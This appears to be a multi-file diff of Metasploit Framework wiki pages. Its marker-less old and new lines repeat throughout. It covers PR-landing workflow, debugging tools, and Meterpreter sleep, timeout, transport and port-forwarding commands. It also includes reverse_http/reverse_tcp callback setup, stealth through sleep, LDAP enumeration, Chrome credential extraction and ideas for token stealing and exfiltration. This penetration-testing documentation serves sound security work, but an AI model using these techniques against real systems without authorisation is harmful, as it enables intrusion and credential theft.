@@ -105,7 +105,7 @@ You can `git fetch` a remote any time, and you'll get access to the latest chang
A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would:
````
```
$ git checkout upstream/pr/1217
Note: checking out 'upstream/pr/1217'.
@@ -124,7 +124,7 @@ HEAD is now at 9e499e5... Make BindTCP test more robust
```
$ git checkout -b landing-1217
````
```
Now, we're on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor's GitHub username and branch name on GitHub), or if there aren't any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7's repo, this is where you land them to the upstream repo).
@@ -173,7 +173,7 @@ You need to add their fork once as a remote: `git remote add OTHER_USER git://gi
This sequence does a few things after editing `.gitconfig`. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217)). Next, I push those changes to my branch (todb-r7, aka "origin"). Finally, I have a mighty [.gitconfig alias here](https://gist.github.com/todb-r7/5438391) to open a browser window to send a pull request to the original contributor's branch (you will want to edit yours to reflect your real GitHub username, of course).
I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.
@@ -208,7 +208,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch
Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:
Or, if he already have upstream-master checked out:
````
```
$ git checkout upstream-master
$ git rebase upstream/master
$ git merge -S --no-ff --edit landing-1217
$ git push upstream upstream-master:master
````
```
The `--edit` is optional if we have our editor configured correctly in `$HOME/.gitconfig`. The point here is that we *always* want a merge commit, and we *never* want to use the (often useless) default merge commit message. For #1217, this was changed to:
````commit
```
Land #1217, java payload build system refactor
````
```
Note that you should rebase *before* landing -- otherwise, your merge commit will be lost in the rebase.
@@ -248,7 +248,7 @@ Finally, the -S indicates we are going to sign the merge, using our GPG key. Thi
To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries:
````
```ini
[user]
name = Your Name
email = your@email.xxx
@@ -256,7 +256,7 @@ signingkey = DEADBEEF # Must match exactly with your key for "Your Name <your@em
[alias]
c = commit -S --edit
m = merge -S --no-ff --edit
````
```
People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].
@@ -271,10 +271,6 @@ Release note examples:
The [rn-no-release-notes](https://github.com/rapid7/metasploit-framework/issues?utf8=%E2%9C%93&q=label%3Arn-no-release-notes+) label must be added if there are no release notes for the merged pull request.
# Cross-linking PRs, Bugs, and Commits
TODO: Update in this new post-Redmine, GitHub issues world
# Merge conflicts
The nice thing about this strategy is that you can test for merge conflicts straight away. You'd use a sequence like:
@@ -16,7 +16,7 @@ If listeners are externalized, then there is an API layer both for interactive i
### Integration of native tool-chains
Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a diffcult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
@@ -26,7 +26,7 @@ Make a new async payload type (based on pingback payload work) making secure com
### Overhaul network targeting
Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart futher. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
```
set TARGETS https://user:password@target_app:4343 https://target_app2
@@ -73,7 +73,7 @@ This module has a selection of inbuilt queries which can be configured via the `
-`ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
-`ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
-`ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
-`ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
-`ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
-`ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
-`ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
-`ENUM_DOMAIN` - Dump info about the Active Directory domain.
@@ -89,7 +89,7 @@ This module has a selection of inbuilt queries which can be configured via the `
-`ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
-`ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
-`ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
-`ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
-`ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow unconstrained delegation.
-`ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
-`ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
-`ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
There are two ways to launch a Post module, both require an existing session.
Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
@@ -4,7 +4,7 @@ SMB (Server Message Blocks), is a way for sharing files across nodes on a networ
There are two main ports for SMB:
- 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
- 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
- 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.
@@ -32,7 +32,7 @@ Each value also has an associated type, for example:
All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:
```
```msf
meterpreter > help reg
Usage: reg [command] [options]
Interact with the target machine's registry.
@@ -44,7 +44,7 @@ Interact with the target machine's registry.
Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.
```
```msf
# Valid: Using single quotes around the registry key
If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:
@@ -2,7 +2,7 @@ Of the many recent changes to Meterpreter, reliable network communication is one
In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.
Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communications. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.
@@ -16,7 +16,7 @@ During this dormant period, no socket is active, no requests are made, and no re
The interface to the sleep command looks like this:
```
```msf
meterpreter > sleep
Usage: sleep <time>
@@ -27,11 +27,11 @@ Usage: sleep <time>
shut down and restarted after the designated timeout.
```
As shown, `sleep` expects to be given a single postive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
As shown, `sleep` expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:
```
```msf
meterpreter > sleep 20
[*] Telling the target instance to sleep for 20 seconds ...
[+] Target instance has gone to sleep, terminating current session.
@@ -57,7 +57,7 @@ The data or time cost of uploading `metsrv`, `stdapi` and `priv` for every singl
It's hard to believe it possible, but in this case the following image could be considered a nightmare.
```
```msf
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 4684 opened ....
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
@@ -95,7 +95,7 @@ With this shellcode stub wired into the DOS header, Metasploit adds the entire b
1. Loads the extension DLL into memory.
1. Calculates the size of the DLL.
1. Writes the size of the DLL as a 32-bit value to the configuration block.
1. Writes the entire body of the DLL, as-is, to the end of the conifiguration block.
1. Writes the entire body of the DLL, as-is, to the end of the configuration block.
Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of `0` (`NULL`) which indicates that the list of extensions has been terminated. This `NULL` value is what `metsrv` will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that's beyond the scope of this article).
@@ -150,4 +150,4 @@ Congratulations, you're dancing with stageless Meterpreter!
At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-site wiring of any of the pre-loaded extensions, the user can just type `use <extension>` just like they used to. Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done.
If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
@@ -28,13 +28,13 @@ In the case of `HTTP/S` payloads it's slightly different because the protocols a
With `TCP` transports, communication "times out" when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn't cause the socket to completely disconnect. With `HTTP/S` transports, the communication "times out" for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a `GET` request results in no acknowledgement.
By default, this value is set to `300` seconds (`5` minutes), but can be overidden by the user via the `SessionCommunicationTimeout` setting.
By default, this value is set to `300` seconds (`5` minutes), but can be overridden by the user via the `SessionCommunicationTimeout` setting.
If connectivity fails, or the communication is deemed to have timed out. Then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit.
#### Retry Total and Retry Wait
After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be availalble due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the `retry total` value. That is, `retry total` is the total amount of time that Meterpreter will retry communication on the transport. The default value is `3600` seconds (`1` hour), and can be overridden via the `SessionRetryTotal` setting.
@@ -44,7 +44,7 @@ While the current time is within the `retry total` time, Meterpreter will consta
Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the `get_timeouts` command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below:
```
```msf
meterpreter > get_timeouts
Session Expiry : @ 2015-06-09 19:56:05
Comm Timeout : 100000 seconds
@@ -56,7 +56,7 @@ The `Session Expiry` value is rendered as an absolute local time so that the use
In order to update these values, users can invoke the `set_timeouts` command. Invoking it without parameters shows the help:
```
```msf
meterpreter > set_timeouts
Usage: set_timeouts [options]
@@ -69,7 +69,7 @@ OPTIONS:
-h Help menu
-t <opt> Retry total time (seconds)
-w <opt> Retry wait time (seconds)
-x <opt> Expiration timout (seconds)
-x <opt> Expiration timeout (seconds)
```
As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command are optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made.
@@ -77,7 +77,7 @@ In the case of the `-x` parameter, the value that is to be passed in should repr
The following example updates the session expiration timeout to be `2` minutes from "now", and changes the retry wait time to `3` seconds:
```
```msf
meterpreter > set_timeouts -x 120 -t 3
Session Expiry : @ 2015-06-02 22:45:13
Comm Timeout : 100000 seconds
@@ -86,7 +86,7 @@ Retry Wait Time : 2500 seconds
```
This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Metepreter will shut down and it's game over:
```
```msf
meterpreter >
[*] 10.1.10.35 - Meterpreter session 2 closed. Reason: Died
@@ -26,7 +26,7 @@ Meterpreter has a new base command called `transport`. This is the hub of all tr
The following output shows the current help text for the `transport` command:
```bash
```msf
meterpreter > transport
Usage: transport <list|change|add|next|prev|remove> [options]
@@ -48,7 +48,7 @@ OPTIONS:
-T <opt> Retry total time (seconds) (default: same as current session)
-U <opt> Proxy username for HTTP/S transports (optional)
-W <opt> Retry wait time (seconds) (default: same as current session)
-X <opt> Expiration timout (seconds) (default: same as current session)
-X <opt> Expiration timeout (seconds) (default: same as current session)
-c <opt> SSL certificate path for https transport verification (optional)
-h Help menu
-i <opt> Specify transport by index (currently supported: remove)
@@ -65,7 +65,7 @@ OPTIONS:
The simplest of all the sub-commands in the `transport` set is `list`. This command shows the full list of currently enabled transport, and an indicator of which one is the "current" transport. The following shows the non-verbose output with just the default transport running:
```bash
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -82,7 +82,7 @@ The above output shows that we have one transport enabled that is using `TCP`. W
The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:
```bash
```msf
meterpreter > transport list -v
Session Expiry : @ 2015-06-09 19:56:05
@@ -98,7 +98,7 @@ Adding transports gives Meterpreter the ability to work on different transport m
The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:
```bash
```msf
meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A "Totes-Legit Browser/1.1"
[*] Adding new transport ...
[+] Successfully added reverse_http transport.
@@ -127,7 +127,7 @@ It is also possible to specify the following:
The following shows another example which adds another `reverse_tcp` transport to the transport list:
```bash
```msf
meterpreter > transport add -t reverse_tcp -l 10.1.10.40 -p 5005
[*] Adding new transport ...
[+] Successfully added reverse_tcp transport.
@@ -155,7 +155,7 @@ The three different ways to change transports are:
As an example, here is the current transport setup:
From here, moving backward sends Meterpreter back to the `reverse_http` listener:
```bash
```msf
meterpreter > transport prev
[*] Changing to previous transport ...
@@ -252,7 +252,7 @@ The command is similar to `add` in that it takes a subset of the parameters, and
* `-p` - The `LPORT` value.
* `-u` - This value is only required for `reverse_http/s` transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions.
```bash
```msf
[*] Starting interaction with 2...
meterpreter > transport list
@@ -282,7 +282,7 @@ Previously, Meterpreter only had built-in resiliency in the `HTTP/S` payloads an
The following shows Metasploit being closed and leaving the existing `TCP` session running behind the scenes:
```bash
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -301,7 +301,7 @@ With Metasploit closed, the Meterpreter session has detected that the transport
The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically:
@@ -63,7 +63,7 @@ Related open tickets (slightly broader than Meterpreter):
* PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn't work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC
* Binary installed death dates: A way putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode)
* Allow Meterpreter sesssions to resolve L3 addresses (#4793)
* Allow Meterpreter sessions to resolve L3 addresses (#4793)
* Track whether or not the current session has admin credentials (#4633)d
* Support Metasploit-side zlib compression of sessions
* Being able to use Meterpreter instances to easily forward commands & exfil
One of the most important things to learn when first working with Metasploit is how to navigate Metasploit's codebase. However, its often not immediately clear how this should be done. This page aims to explain some of the different approaches that one can take when navigating Metasploit's codebase and provides a primer for learning how Metasploit's codebase is structured.
A quick reminder before we get started, but one can always access the Metasploit Slack at <https://metasploit.slack.com/>. Normally this page should allow you to sign up, however if for any reason you cannot, feel free to shoot an email to msfdev *at* rapid7 *dot* com and we will be happy to send you an invite link.
Metasploit Code Structure
------------------------
# Metasploit Code Structure
A great outline of Metasploit's code structure can be found at <https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/>, which should be referred to for an overview of Metasploit's code structure. To repeat what is said there there are the following main subdirectories:
* **data** - Our general data storage area. Used to store wordlists for use by modules, binaries that are used by exploits, images, and more.
@@ -23,25 +23,136 @@ A great outline of Metasploit's code structure can be found at <https://www.offe
* **scripts** - Stores various scripts used within Metasploit, such as Meterpreter, and scripts for the console interface of Metasploit Framework.
* **spec** - Contains various RSpec checks that are used to ensure libraries and core functionality within the framework are working as expected. If you are writing a new library or adjusting one, you may need to update the corresponding RSpec file within this directory to ensure the specification checks are updated to reflect the new behavior.
* **test** - Contains tests for various parts of Metasploit code to ensure they are operating as expected.
* **tools** - Contains various tools that may be helpful under different situations. The `dev` directory contains tools useful during development, such as `tools/dev/msftidy_docs.rb` which helps ensure your documentation is in line with standards.
* **tools** - Contains various tools that may be helpful under different situations. The `dev` directory contains tools useful during development, such as `tools/dev/msftidy_docs.rb` which helps ensure your documentation is in line with standards.~~
# Code Navigation Tools
GitHub Code Navigation
------------------------
## GitHub Code Navigation
You can search through the code of Metasploit using GitHub with searches such as <https://github.com/rapid7/metasploit-framework/search?l=Ruby&q=%22payload.arch%22&type=code>. Note that double quotes are required to match specifically on a certain term; in the previous example this term was `payload.arch`. You can also set the `type=code` parameter to specifically match only on code results, however this can be set to `commits` or `issues` if you want to search commits or issues instead. Finally notice that when searching code, its important to also specify the language of the files you want to match. In the case above I made it so that my results would only match on files deemed by GitHub to contain Ruby code, however you can also specify other languages such as Batch, or C if you want those languages instead. You can even remove the language restriction if you find your search results are too narrow.
Another incredibly useful feature of GitHub is the ability to search across all repositories that an organization owns. This is especially useful in Metasploit as certain components, such as Rex code and payload code, may be contained in repositories other than `metasploit-framework`. To search across the public repositories that Rapid7 owns, use a search such as <https://github.com/search?q=org%3Arapid7+%22payload.arch%22&type=code>. Note the presence of the `org:rapid7` tag within the previous URL: this tells GitHub to look through all repositories that Rapid7 owns for the term `payload.arch` within any code files.
Experiment with these results and play around with GitHub searches more. Over time you will learn where it is useful and where it has its limitations and will be able to determine when it might be better to use an IDE to help understand a piece of code more.
IDE Code Navigation
------------------------
## SolarGraph Code Navigation
A better way to navigate code, particularly across repos, and also find out where things are defined using an easy to use interface, is SourceGraph from
<https://sourcegraph.com>. The interface is not hard to use and you can find several tutorials over at <https://docs.sourcegraph.com/tutorials> on how to use it.
The main benefit of SourceGraph over GitHub is the ability to search all known repositories at once and then easily jump between definitions using either the
online search at <https://sourcegraph.com/search>, or the GitHub integrated browser plugin from <https://docs.sourcegraph.com/integration/browser_extension> to allow
easy navigation of Metasploit and Rapid7 code from your GitHub PR reviews.
It is also recommended to review the tutorials and better understand some of the advanced search capabilities of SourceGraph as they do provide some useful search
functionality that is not available or may be harder to perform with GitHub.
# IDE Code Navigation
## RubyMine Code Navigation
One of the best ways to navigate the codebase within Metasploit is to use RubyMine, available from <https://www.jetbrains.com/ruby/>. Whilst it is a paid tool, it offers a variety of neat referencing finding features such as the ability to right click on a method name and select `Find Usages`, or to right click the method name and select `Go To -> Declaration or Usages` to find all the locations where that method might of been defined within the codebase, which can make tracing complex definitions that wind between library and module code much easier. RubyMine also offers autocompletion and integrates well with many tools such as Git to allow you to quickly switch branches and RuboCop to help provide suggestions on where your code style could be improved.
For a cheaper option one can also use VS Code. Note however that VS Code does not have the best autotab completion and will not allow you to trace references, however if your willing to put up with this, it is a much faster and more lightweight product than RubyMine, which makes it great for those times when you just need to edit a piece of code without loading a bunch of related files that you don't need to reference or edit. It also has great regex search features that work much faster than RubyMine, allowing you to search for items within the codebase a lot quicker than you can with RubyMine, which will often seem to stutter at times due to its larger overhead.
Ultimately though the tool that you pick should be up to you. Some may prefer to work with vim/nano/emacs or some other command line editor over a GUI interface. Use whatever you can afford and feels comfortable to you!
Pry Debugging
------------------------
Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn what a piece of code is doing. In these cases, it may be helpful to use `pry`, a Ruby Debugger that can be launched at a specific place within your code and which allows you to view the state of the program at that time, make adjustments as needed, and then either step through the program or continue to let it run. A full tutorial on Pry will not be provided here, instead readers are encouraged to read up on the various guides on Pry available online, such as <https://learn.co/lessons/debugging-with-pry>
## SolarGraph Code Navigation - VSCode
We'd be remiss to not mention SolarGraph as a potential plugin that one can use to navigate code within VSCode. This tool
provides a lot of the autocomplete and IntelliSense functionality you might get from dedicated IDEs such as RubyMine, within
VSCode itself. The tool can be installed by running `gem install solargraph-rails` for the Rails integrations, which will
also in turn install `solargraph` itself. If you just want SolarGraph without the Rails integrations, run `gem install solargraph`.
The configuration file for SolarGraph itself can be found at `.solargraph.yml` within the root directory of Metasploit Framework.
For more information on how this works and how to tweak it, please refer to <https://solargraph.org/guides/configuration>.
Once the Gem files have been installed, the next step is to install the VSCode plugin. You can grab it from
<https://marketplace.visualstudio.com/items?itemName=castwide.solargraph>. Once this is done, run the following commands
to ensure that SolarGraph is using the most up to date information about your code:
```
bundle install # Update all the gems
yard gems # Create documentation files for all the gems. SolarGraph relies on YARD for a lot of info.
yard doc -c # Create YARD docs for all files and use the cache so we don't repeat work (-c option).
solargraph bundle # Update Solargraph documentation for bundled gems
```
Then close down VSCode and restart it again, opening up the `metasploit-framework` directory again as a project if needs be.
This should result in the SolarGraph server starting and then taking a few minutes to index your files. Note that this
process may occur every time you open up the `metasploit-framework` project. This is normal and to be expected.
If you'd like to save yourself some time, you can have YARD automatically generate new documentation for installed Gems
by running `yard config --gem-install-yri` which will configure YARD to automatically generate documentation whenever
new Gems are installed.
# Debugging Metasploit
## Pry Debugging
Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn
what a piece of code is doing. In these cases, it may be helpful to use `pry`, a Ruby Debugger that can be launched at
a specific place within your code and which allows you to view the state of the program at that time,
make adjustments as needed, and then either step through the program or continue to let it run.
You can enter into an interactive debugging environment using `pry` by adding the following code
snippet within your Metasploit module or library method:
```ruby
require 'pry'; binding.pry
```
Pry includes inbuilt commands for code navigation:
- `backtrace`: Show the current call stack
- `up` / `down`: Navigate the call stack
- `step`: Move forward by a single execution step
- `next`: Move forward by a single line
- `whereami`: Show the current breakpoint location again
- `help`: View all of the available commands and options
Ruby's runtime introspection can be used to view the available methods, classes, and variables within the current Ruby environment:
- `self`: To find out what the current object is
- `self.methods`: Find all available methods
- `self.methods.grep /send/`: Searching for a particular method that you're interested in. This can be great to explore unknown APIs.
- `self.method(:connect).source_location`: Find out which file, and which line, defined a particular method
- `self.class.ancestors`: For complex modules, this can be useful to see what mixins a Metasploit module is currently using
To learn more about Pry, we recommend reading GitLab's guide at <https://docs.gitlab.com/ee/development/pry_debugging.html>.
## Debug.gem Debugging
Ruby 3.1 and later come with `debug.gem` installed automatically, which is the new default debugger for Ruby. It replaces
the old `lib/debug.rb` library that was not actively being maintained and replaces it with a modern debugging library
capable of performing many debugging actions with next to no impact on the performance of the debugged application.
Whilst RubyMine does not support the `debug.gem` functionality, you can use VSCode to take advantage of `debug.gem`
to get speedy debugging of Ruby scripts from within VSCode itself. Simply install the debugging plugin
from <https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg>, then go to the Metasploit root directory,
and if you have Bundler installed, run `bundle install`. This will bring in the latest version of the `debug` gem.
Once this is all done, open the `metasploit-framework` folder from a cloned GitHub copy of Metasploit Framework in VSCode
by using `File->Open Folder`. Then click `Run->Add Configuration->Ruby(rdbg)`. This will create a file at
`<metasploit root>/.vscode/launch.json`. Replace the contents of this file with the contents of the file at
<https://github.com/rapid7/metasploit-framework/blob/master/external/vscode/launch.json>. If you wish, you can
optionally change the listening port from `55634` in the script to one of your choice.
Finally click `Run->Start Debugging` to start debugging Metasploit Framework using VSCode. This may cause a prompt to
appear that looks like `bundle exec ruby /home/tekwizz123/git/metasploit-framework/msfconsole`. Confirm this looks okay
and that you are using `bundle exec ruby` to execute `msfconsole`. If all looks good, hit the `ENTER` key to confirm.
At this point you should see Metasploit Framework open up.
If you want to prevent this prompt in the future then simply remove the `"askParameters": true,` line from `launch.json`.
Once in a debugging session, debug.gem supports the same commands as Pry in may cases, so the commands listed in the
Pry section above should work in the same manner. Additionally debug.gem also supports extra commands for things such as
tracing data. For more details refer to the command list at <https://github.com/ruby/debug#debug-command-on-the-debug-console>
which provides a detailed list of debug.gem's supported commands. For more information on the VSCode rdbg plugin,
refer to <https://code.visualstudio.com/docs/languages/ruby> and <https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg>.
## RubyMine Debugging
RubyMine comes with its own built in debugger that is based off of the old `lib/debug.rb` library in Ruby, however it
has custom patches and modifications applied to it by the JetBrains team. To set it up, first clone the Git repository
for Metasploit-Framework locally, then go `File->Open` and click on the `metasploit-framework` folder to open it as a project.
Once this is done, go to `Run->Edit Configurations` and click the plus sign to add a new configuration. Select
`Ruby`, and in the name field, enter a name that makes sense for you, such as `Metasploit Debug`. Under `Ruby Script`,
enter the full path to `msfconsole` on your local machine. Finally, set the SDK to either `Use Project SDK` or select
another Ruby SDK that RubyMine recognizes.
You can add a Ruby SDK by going to `File->Settings->Languages and Frameworks->Ruby SDK and Gems` and clicking the plus sign.
@@ -33,7 +33,7 @@ If you downloaded Metasploit from us, there is no cause for alarm. We pride our
### Windows silent installation
The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
InstantClient 10 is recommneded to allow you to talk with 8,9,10,&11 server versions.
InstantClient 10 is recommended to allow you to talk with 8,9,10,&11 server versions.
Go to <https://www.oracle.com/database/technologies/instant-client/downloads.html> and select the link corresponding to your UNIX PC's architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.
```msf
msf6 post(multi/manage/autoroute) > route flush
@@ -290,7 +290,7 @@ Active sessions
#### Local Port Forwarding
To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:
To add a port forward, use `portfwd add` and specify the `-l`, `-p` and `-r` options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively.
[*] Local TCP relay created: :1090 <-> 169.254.37.128:443
meterpreter >
@@ -338,7 +338,7 @@ Note that you may need to edit your `/etc/hosts` file to map IP addresses to giv
#### Listing Port Forwards and Removing Entries
Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.
```
```msf
meterpreter > portfwd delete -l 1090
[*] Successfully stopped TCP relay on 0.0.0.0:1090
meterpreter > portfwd list
@@ -355,7 +355,7 @@ To set up a reverse port forward, use `portfwd add -R` within a supported sessio
